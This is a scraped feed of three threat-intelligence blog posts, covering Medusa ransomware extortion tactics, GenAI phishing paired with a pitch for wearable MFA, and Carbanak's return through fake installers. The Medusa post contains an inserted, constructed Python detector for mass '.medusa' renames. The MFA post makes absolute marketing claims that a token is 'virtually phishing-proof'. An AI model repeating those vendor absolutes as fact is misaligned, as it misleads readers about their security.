<p>Link to full report: <a href="{{#staticFileLink}}12368052261,original{{/staticFileLink}}">IR-24-029-001_WhiteBat.pdf</a></p></div>Medusa Grew New Snakeshttps://redskyalliance.org/xindustry/medusa-grew-new-snakes2024-01-26T17:00:00.000Z2024-01-26T17:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12364610092,RESIZE_930x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12364610092,RESIZE_400x{{/staticFileLink}}" width="250" alt="12364610092?profile=RESIZE_400x" /></a>The threat actors associated with the Medusa ransomware have ramped up their activities following the debut of a dedicated data leak site on the dark web in February 2023 to publish sensitive data of victims unwilling to agree to their demands. As part of their multi-extortion strategy, this group will provide victims with multiple options when their data is posted on their leak site, such as time extension, data deletion, or downloading all the data. These options have a price tag depending on the organization impacted by this group.</p>
<p>The Roman author Ovid describes the mortal Medusa as a beautiful maiden seduced by Poseidon in the temple of Athena. Such a sacrilege attracted the goddess' wrath, and she punished Medusa by turning her hair into snakes. While these stories sound fantastical today, to the ancient Greeks, they were quasi-historical.</p>
<p>Medusa (not to be confused with Medusa Locker) refers to a ransomware family that appeared in late 2022 before coming into prominence in 2023. It's known for opportunistically targeting high technology, education, manufacturing, healthcare, and retail industries.<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/redshorts2023/medusa-ransomware-gang-picks-up-steam-as-it-targets-companies-wor">https://redskyalliance.org/redshorts2023/medusa-ransomware-gang-picks-up-steam-as-it-targets-companies-wor</a></p>
<p>As many as 74 organizations, mostly in the US, the UK, France, Italy, Spain, and India, are estimated to have been impacted by the ransomware in 2023. Ransomware attacks organized by the group commence with exploiting internet-facing assets or applications with known unpatched vulnerabilities and hijacking legitimate accounts, often employing initial access brokers to obtain a foothold to target networks.</p>
<p>In one instance, researchers observed a Microsoft Exchange Server being exploited to upload a web shell, which was then used as a conduit to install and execute the ConnectWise remote monitoring and management (RMM) software. A notable aspect of the infections is the reliance on living-off-the-land (LotL) techniques to blend in with legitimate activity and sidestep detection. Also observed is the use of a pair of kernel drivers to terminate a hard-coded list of security products.</p>
<p>The initial access phase is followed by discovery and reconnaissance of the compromised network, with the actors ultimately launching the ransomware to enumerate and encrypt all files save for those with the extensions .dll, .exe, .lnk, and .medusa (the extension given to the encrypted files).</p>
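<p>The mass-rename pattern described above (files gaining a .medusa extension while .dll, .exe and .lnk files are left alone) is something a file-server monitor can alert on. The following is an added example, not code from the post or from the cited researchers: it reads constructed rename events in a made-up "timestamp|op|old|new" format and raises an alert when a burst of encryption-style renames occurs; the window size, threshold, paths and the assumption that the encrypted name is either name.ext.medusa or name.medusa are all illustrative choices, not details from the post.</p>

```python
"""Added example (not from the Red Sky Alliance post): a burst detector for
the mass-rename signature Medusa leaves behind (files gaining .medusa).
Event format, paths, window and threshold are constructed for the demo."""
from collections import deque
from datetime import datetime, timedelta
from pathlib import PurePosixPath

ENCRYPTED_SUFFIXES = {".medusa"}                  # extension named in the post
MEDUSA_SKIPS = {".dll", ".exe", ".lnk", ".medusa"}  # extensions the post says it skips
WINDOW = timedelta(seconds=10)                    # constructed tuning value
THRESHOLD = 5                                     # constructed tuning value


def parse_event(line):
    """Parse one constructed event line: 'ISO-timestamp|OP|old_path|new_path'."""
    ts, op, old, new = line.strip().split("|")
    return datetime.fromisoformat(ts), op, old, new


def classify_rename(old, new):
    """'encrypt' if a file gains an encrypted suffix, 'unexpected' if it does so
    from an extension Medusa is documented to skip, None otherwise.
    Assumption: encrypted name is name.ext.medusa or name.medusa."""
    o, n = PurePosixPath(old), PurePosixPath(new)
    if n.suffix not in ENCRYPTED_SUFFIXES:
        return None
    stem = n.with_suffix("")
    if stem not in (o, o.with_suffix("")):
        return None  # unrelated rename that merely ends in .medusa
    return "unexpected" if o.suffix in MEDUSA_SKIPS else "encrypt"


def detect_bursts(lines):
    """Slide a time window over rename events and emit one alert each time the
    count of encryption-style renames reaches THRESHOLD. Returns (alerts,
    unexpected): alerts are (timestamp, count, paths); unexpected lists renames
    that do not match the post's description of Medusa and deserve a manual
    look rather than being discarded (they still count toward the burst)."""
    window = deque()
    alerts, unexpected = [], []
    for line in lines:
        ts, op, old, new = parse_event(line)
        if op != "RENAME":
            continue
        kind = classify_rename(old, new)
        if kind is None:
            continue
        if kind == "unexpected":
            unexpected.append(old)
        window.append((ts, old))
        while ts - window[0][0] > WINDOW:   # evict events older than the window
            window.popleft()
        if len(window) == THRESHOLD:
            alerts.append((ts, len(window), [p for _, p in window]))
    return alerts, unexpected


# Constructed sample events: five user documents encrypted within seconds, one
# benign rename, one create, one .exe rename (odd for Medusa), one lone event.
SAMPLE_EVENTS = [
    "2024-01-25T10:00:00|RENAME|/srv/share/q4/report.docx|/srv/share/q4/report.docx.medusa",
    "2024-01-25T10:00:01|RENAME|/srv/share/q4/budget.xlsx|/srv/share/q4/budget.xlsx.medusa",
    "2024-01-25T10:00:01|CREATE||/srv/share/q4/~lock.tmp",
    "2024-01-25T10:00:02|RENAME|/srv/share/q4/notes.txt|/srv/share/q4/notes.txt.medusa",
    "2024-01-25T10:00:02|RENAME|/srv/share/q4/archive.zip|/srv/share/q4/archive.zip.bak",
    "2024-01-25T10:00:03|RENAME|/srv/share/q4/deck.pptx|/srv/share/q4/deck.pptx.medusa",
    "2024-01-25T10:00:04|RENAME|/srv/share/q4/scan.pdf|/srv/share/q4/scan.pdf.medusa",
    "2024-01-25T10:00:05|RENAME|/srv/share/q4/tools/setup.exe|/srv/share/q4/tools/setup.exe.medusa",
    "2024-01-25T10:30:00|RENAME|/home/alice/old.bak|/home/alice/old.medusa",
]

if __name__ == "__main__":
    found, odd = detect_bursts(SAMPLE_EVENTS)
    for ts, count, paths in found:
        print(f"ALERT {ts.isoformat()}: {count} encryption-style renames within {WINDOW}")
        for p in paths:
            print("   ", p)
    for p in odd:
        print("REVIEW (extension Medusa is documented to skip):", p)
```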
<p>For each compromised victim, Medusa's leak site displays information about the organizations, ransom demanded, the amount of time left before the stolen data is released publicly, and the number of views in a bid to exert pressure on the company. The cyber threat actors also offer different choices to the victim, all of which involve some form of extortion to delete or download the pilfered data and seek a time extension to prevent the data from being released.</p>
<p>As ransomware continues to be an uncontrolled threat, targeting tech companies, healthcare, critical infrastructure, and everything in between, the threat actors behind it are getting more brazen with their tactics, going beyond publicly naming and shaming organizations by resorting to threats of physical violence and even dedicated public relations channels. Recent ransomware has changed many facets of the threat landscape, but a key recent development is its increasing commoditization and professionalization. The actors have become more business savvy.</p>
<p>Medusa likely has a media team to handle its branding efforts and leverages a public Telegram channel named "information support," where files of compromised organizations are shared and can be accessed over the clearnet. The channel was set up in July 2021. “The emergence of the Medusa ransomware in late 2022 and its notoriety in 2023 marks a significant development in the ransomware landscape," the researchers said. "This operation showcases complex propagation methods, leveraging both system vulnerabilities and initial access brokers, while adeptly avoiding detection through living-off-the-land techniques."</p>
<p>The development comes as Arctic Wolf Labs publicized two cases in which Akira and Royal ransomware gang victims were targeted by malicious third parties posing as security researchers for secondary extortion attempts. The threat actors spun a narrative of trying to help victim organizations, offering to hack into the server infrastructure of the original ransomware groups involved to delete exfiltrated data; security researchers noted that the threat actor sought about five (5) bitcoin in exchange for the service.</p>
<p>It also follows a new advisory from the Finnish National Cyber Security Centre (NCSC-FI) about a spike in Akira ransomware incidents in the country towards the end of 2023 by exploiting a security flaw in Cisco VPN appliances (CVE-2023-20269, CVSS score: 5.0) to breach domestic entities.</p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2024/01/medusa-ransomware-on-rise-from-data.html">https://thehackernews.com/2024/01/medusa-ransomware-on-rise-from-data.html</a></p></div>Ransomware Armageddonhttps://redskyalliance.org/xindustry/ransomware-armageddon2024-01-20T12:30:00.000Z2024-01-20T12:30:00.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}12361106501,original{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12361106501,RESIZE_400x{{/staticFileLink}}" width="250" alt="12361106501?profile=RESIZE_400x" /></a>The least surprising headline from 2023 is that ransomware again set new records for the number of incidents and the damage inflicted. There were new headlines every week, which included big-name organizations: MGM, Johnson Controls, Clorox, Hanes Brands, Caesars Palace, and so many others.</p>
<p>Phishing-driven ransomware is the cyber threat that looms larger and more dangerous than all others. CISA and Cisco report that 90% of data breaches are the result of phishing attacks and monetary losses that exceed $10 billion in total. A report from Splunk revealed that 96 percent of companies fell victim to at least one phishing attack in the last 12 months and 83 percent suffered two or more.<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/xindustry/impersonation-at-the-top-of-phishing-attack-plans">https://redskyalliance.org/xindustry/impersonation-at-the-top-of-phishing-attack-plans</a></p>
<p>Cybersecurity professionals have seen incredible advances in defenses in the past 20 years. The one thing that has not advanced is humans. Users in every organization are not much more advanced at stopping cyber-attacks than they were two decades ago. This is why phishing is so effective for cybercriminals: it exploits human weaknesses, not technology. That leaves legacy MFA as the most critical defense mechanism, and most companies are using legacy MFA technology that is over 20 years old.</p>
<p>With the rise of Generative Artificial Intelligence (GenAI), cybercriminals are able to take phishing to an entirely new level where every attack can become nearly impossible for users to identify, and attackers will now be able to do this with little effort. Read on to find out why, and what you can do about it. Phishing uses deceptive communications (emails, text messages, and voice messages) to trick users into revealing sensitive information, including login credentials, passwords, one-time passwords, and personal information, and into clicking on phony approval messages.</p>
<p>Cybercriminal gangs are learning to use the incredible power of GenAI tools like fraud-versions of ChatGPT to create more persuasive, convincing, and realistic phishing messages. This highly personalized and context-aware text is practically indiscernible from normal human communication. This makes it extremely challenging for recipients to tell the difference between genuine and fake messages. LLMs also allow almost anyone, not just the hacking pros, to launch phishing attacks.</p>
<p>Traditional anti-phishing solutions are not effective at detecting the latest phishing messages created by GenAI. GenAI content lacks telltale signs of phishing, like misspellings or generic language. Phishing detection tools rely on pattern recognition and known indicators of phishing that will no longer be present. Perhaps more worrisome, GenAI tools are enabling cybercriminals to conduct highly targeted phishing campaigns on a massive scale. Threat actors can now automate the generation of a virtually unlimited number of custom-tailored phishing messages for a wide range of victims.</p>
<p>The explosion of GenAI-powered phishing attacks raises a big question: will we ever be able to spot super-realistic fakes? Are we losing the fight against phishing? This question is leading many companies to reexamine their anti-phishing tactics. To fight phishing attacks head-on, they must upgrade the primary targets of phishing, credentials and legacy MFA, by going passwordless to eliminate reliance on traditional credentials and by implementing next-generation MFA to replace the 20-year-old technology of legacy MFA.</p>
<p>Innovative companies are moving away from username and password to passwordless authentication. Yet these solutions, while a giant leap forward, also have limitations. A lost, stolen, or compromised device that is not biometric can be used to gain unauthorized access, and mobile phones and other BYOD devices are out of the control of the organization and are susceptible to all types of malware being downloaded by the user.</p>
<p>For these reasons and others, security-first companies are making the decision to move to next-generation multi-factor authentication. The next-generation MFA replaces traditional credentials, password-based authentication, and inconvenient and vulnerable legacy MFA solutions. The next-generation MFA paradigm relies on a physical, wearable FIDO2-compliant device that eliminates the human factor in phishing, making it virtually phishing-proof. These cutting-edge biometric wearables also protect organizations against BYOD vulnerabilities, lost and stolen credentials, weak passwords, credential stuffing, MFA prompt bombing, and easily stolen SMS one-time passcodes.</p>
<p>Unlike traditional MFA, attackers simply cannot bypass next-gen MFA with malware, MFA fatigue attacks, adversary-in-the-middle (AiTM) attacks, and other methods. Since the authenticator always remains with the user, wearable next-gen MFA tokens are constantly safe and immediately available for authentication. Only the authorized user can use the device, and no attacker can access the secrets, keys, and biometrics stored on it.</p>
<p>GenAI is powering the coming tsunami of phishing attacks that are effectively nullifying traditional phishing defenses and obsoleting legacy MFA. Wearable, next-generation MFA devices like Token Ring stop the most sophisticated phishing attacks and are the best defense against the coming phishing Armageddon.</p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2024/01/there-is-ransomware-armageddon-coming.html">https://thehackernews.com/2024/01/there-is-ransomware-armageddon-coming.html</a></p></div>Carbanak Banking Malwarehttps://redskyalliance.org/xindustry/carbanak-banking-malware2024-01-05T13:00:00.000Z2024-01-05T13:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12345056663,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12345056663,RESIZE_180x180{{/staticFileLink}}" width="175" alt="12345056663?profile=RESIZE_180x180" /></a>The banking malware known as Carbanak has been observed in ransomware attacks with updated tactics. The malware has adapted to incorporate new attack vectors and techniques to diversify its effectiveness. Carbanak returned in November 2023 through new distribution chains, being spread through compromised websites that impersonate various business-related software.</p>
<p>See: <a href="https://redskyalliance.org/Finance/never-take-malware-from-strangers">https://redskyalliance.org/Finance/never-take-malware-from-strangers</a></p>
<p>Some impersonated tools include popular business-related software such as HubSpot, Veeam, and Xero. Carbanak, detected in use since at least 2014, is known for its data exfiltration and remote control features. Starting off as banking malware, it has been used by the FIN7 cybercrime syndicate.<a href="#_ftn1">[1]</a></p>
<p>In the latest attack chain, the compromised websites are designed to host malicious installer files masquerading as legitimate utilities to trigger the deployment of Carbanak. The development comes as 442 ransomware attacks were reported last month, up from 341 incidents in October 2023. This year, 4,276 cases have been reported, which is "less than 1000 incidents fewer than the total for 2021 and 2022 combined (5,198)."</p>
<p>Data shows that industrials (33%), consumer cyclical (18%), and healthcare (11%) emerged as the top targeted sectors, with North America (50%), Europe (30%), and Asia (10%) accounting for most of the attacks. As for the most commonly spotted ransomware families, LockBit, BlackCat, and Play contributed 47% (or 206 attacks) of the 442 attacks. With BlackCat dismantled by authorities this month, it remains to be seen what impact the move will have on the threat landscape in the near term.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/those-darn-blackcats">https://redskyalliance.org/xindustry/those-darn-blackcats</a></p>
<p>According to investigators, the total number of attacks has surpassed 4,000 which marks a massive increase from 2021 and 2022, so it will be interesting to see if ransomware levels continue to climb next year. The spike in ransomware attacks in November 2023 has also been corroborated by cyber insurance firm Corvus, which said it identified 484 new ransomware victims posted to leak sites.</p>
<p>“The ransomware ecosystem at large has successfully pivoted away from QBot," the company said. "Making software exploits and alternative malware families part of their repertoire is paying off for ransomware groups."</p>
<p>See: <a href="https://redskyalliance.org/xindustry/07734-qbot-the-calculator-episode">https://redskyalliance.org/xindustry/07734-qbot-the-calculator-episode</a></p>
<p>While the shift results from a law enforcement takedown of QBot's (aka QakBot) infrastructure, Microsoft investigators reportedly disclosed details of a low-volume phishing campaign distributing the malware, underscoring the challenges in fully dismantling these groups.</p>
<p>The development comes as Kaspersky revealed that Akira ransomware's security measures prevent its communication site from being analyzed by raising exceptions when someone attempts to access the site using a debugger in the web browser. The Russian cybersecurity company further highlighted ransomware operators' exploitation of different security flaws in the Windows Common Log File System (CLFS) driver (CVE-2022-24521, CVE-2022-37969, CVE-2023-23376, and CVE-2023-28252; CVSS scores: 7.8) for privilege escalation.</p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2023/12/carbanak-banking-malware-resurfaces.html/">https://thehackernews.com/2023/12/carbanak-banking-malware-resurfaces.html/</a></p></div>